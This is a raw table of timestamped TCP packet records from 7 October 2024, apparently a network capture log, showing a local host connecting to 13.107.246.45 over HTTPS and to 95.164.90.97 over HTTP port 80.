Oct 7, 2024 03:15:29.295216084 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.295883894 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.295883894 CEST	49770	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.295892954 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.295897007 CEST	443	49770	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.299211025 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.299262047 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.299432039 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.299710989 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.299740076 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.403769970 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.427392006 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.427392006 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.427437067 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.427443981 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.524606943 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.524673939 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.524992943 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.525325060 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.525325060 CEST	49771	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.525345087 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.525358915 CEST	443	49771	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.543441057 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.543494940 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.543627977 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.546359062 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.546375990 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.904876947 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.908191919 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.908251047 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.908797026 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.908809900 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.926913977 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.927237988 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.927311897 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.927330017 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.927900076 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.927906036 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.928384066 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.928401947 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.928792000 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.928796053 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.943082094 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.943485975 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.943517923 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:29.943861961 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:29.943873882 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.009943008 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.010099888 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.010278940 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.018384933 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.018384933 CEST	49772	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.018423080 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.018455029 CEST	443	49772	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.028646946 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.028722048 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.028815985 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.029933929 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.029933929 CEST	49774	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.029953957 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.029964924 CEST	443	49774	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.031088114 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.031155109 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.031222105 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.041975975 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.042119980 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.042181969 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.078495979 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.078557968 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.078588963 CEST	49775	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.078608036 CEST	443	49775	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.079464912 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.079464912 CEST	49773	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.079489946 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.079498053 CEST	443	49773	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.083440065 CEST	49777	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.083498001 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.083573103 CEST	49777	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.085598946 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.085607052 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.085704088 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.085931063 CEST	49777	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.085947037 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.089276075 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.089334965 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.090053082 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.091927052 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.091948032 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.092075109 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.092152119 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.096410990 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.096457958 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.096801996 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.097356081 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.097376108 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.209018946 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.209456921 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.209484100 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.209892035 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.209897041 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.312263012 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.312419891 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.312477112 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.312622070 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.312644958 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.312668085 CEST	49776	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.312675953 CEST	443	49776	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.315505028 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.315545082 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.315718889 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.316035986 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.316049099 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.727147102 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.727555990 CEST	49777	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.727629900 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.727989912 CEST	49777	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.728005886 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.729001045 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.729324102 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.729341984 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.729665995 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.729679108 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.734625101 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.735214949 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.735249996 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.735599995 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.735611916 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.741835117 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.742227077 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.742254972 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.742575884 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.742587090 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.806164026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:30.811132908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:30.811409950 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:30.811645031 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:30.816447020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:30.827572107 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.827739000 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.827811003 CEST	49777	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.827956915 CEST	49777	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.827989101 CEST	443	49777	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.828476906 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.828552008 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.828615904 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.829541922 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.829562902 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.829586029 CEST	49778	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.829601049 CEST	443	49778	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.833000898 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.833041906 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.833102942 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.833148956 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.833235025 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.833372116 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.834528923 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.834573984 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.834700108 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.834765911 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.834781885 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.834978104 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.834980011 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.834980011 CEST	49780	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.834991932 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.834995985 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.835001945 CEST	443	49780	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.837335110 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.837378979 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.837563992 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.837724924 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.837760925 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.843674898 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.843811035 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.844002008 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.844072104 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.844094992 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.844113111 CEST	49779	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.844121933 CEST	443	49779	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.846359015 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.846390009 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.846605062 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.846851110 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.846872091 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.955933094 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.956459999 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.956501961 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:30.957112074 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:30.957129002 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:31.055160999 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:31.055310965 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:31.055413008 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:31.055553913 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:31.055574894 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:31.055584908 CEST	49781	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:31.055589914 CEST	443	49781	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:31.061399937 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:31.061443090 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:31.061822891 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:31.062622070 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:31.062649012 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.278853893 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:32.278930902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:32.278991938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:32.279005051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:32.279072046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:32.279072046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:32.284404993 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:32.289252996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:32.476737022 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.477757931 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.478224993 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.478285074 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.483311892 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.488467932 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.488477945 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.489191055 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.489195108 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.489377975 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.489423037 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.489881992 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.489888906 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.490156889 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.490164995 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.490592003 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.490597963 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.490818977 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.490823984 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.491410017 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.491414070 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.491676092 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.491698027 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.492002010 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.492007971 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.585473061 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.585628033 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.585740089 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.585824013 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.585824013 CEST	49785	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.585843086 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.585851908 CEST	443	49785	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.586018085 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.586180925 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.586277962 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.586374998 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.586379051 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.586420059 CEST	49786	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.586424112 CEST	443	49786	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588047028 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588125944 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588241100 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.588515997 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.588567972 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.588568926 CEST	49784	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.588587046 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588596106 CEST	443	49784	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588608980 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588684082 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.588843107 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.588880062 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588897943 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.588963032 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.589013100 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.589034081 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.589061022 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.589119911 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.589270115 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.589288950 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.589612961 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.589612961 CEST	49783	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.589631081 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.589642048 CEST	443	49783	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.590564013 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.590575933 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.590686083 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.590817928 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.590831995 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.591115952 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.591139078 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.591136932 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.591291904 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.591322899 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.591420889 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.591420889 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.591492891 CEST	49787	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.591520071 CEST	443	49787	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.591660976 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.591715097 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.593667030 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.593713999 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.593801022 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.593940973 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:32.593959093 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:32.907769918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:32.910357952 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:32.911614895 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:32.916589022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:33.224354029 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.225418091 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.225470066 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.225843906 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.225861073 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.229098082 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.229865074 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.229902983 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.230653048 CEST	49789	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.230659962 CEST	443	49789	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.242484093 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.242957115 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.242989063 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.243052959 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.243655920 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.243664026 CEST	49791	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.243674994 CEST	443	49791	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.243674994 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.244088888 CEST	49790	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.244095087 CEST	443	49790	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.257603884 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.257934093 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.257951021 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.258465052 CEST	49792	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.258471966 CEST	443	49792	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.323954105 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.324021101 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.324278116 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.324430943 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.324469090 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.324495077 CEST	49788	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.324510098 CEST	443	49788	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.328629017 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.328670025 CEST	443	49793	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:33.328768969 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.329232931 CEST	49793	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:33.329252005 CEST	443	49793	13.107.246.45	192.168.2.5
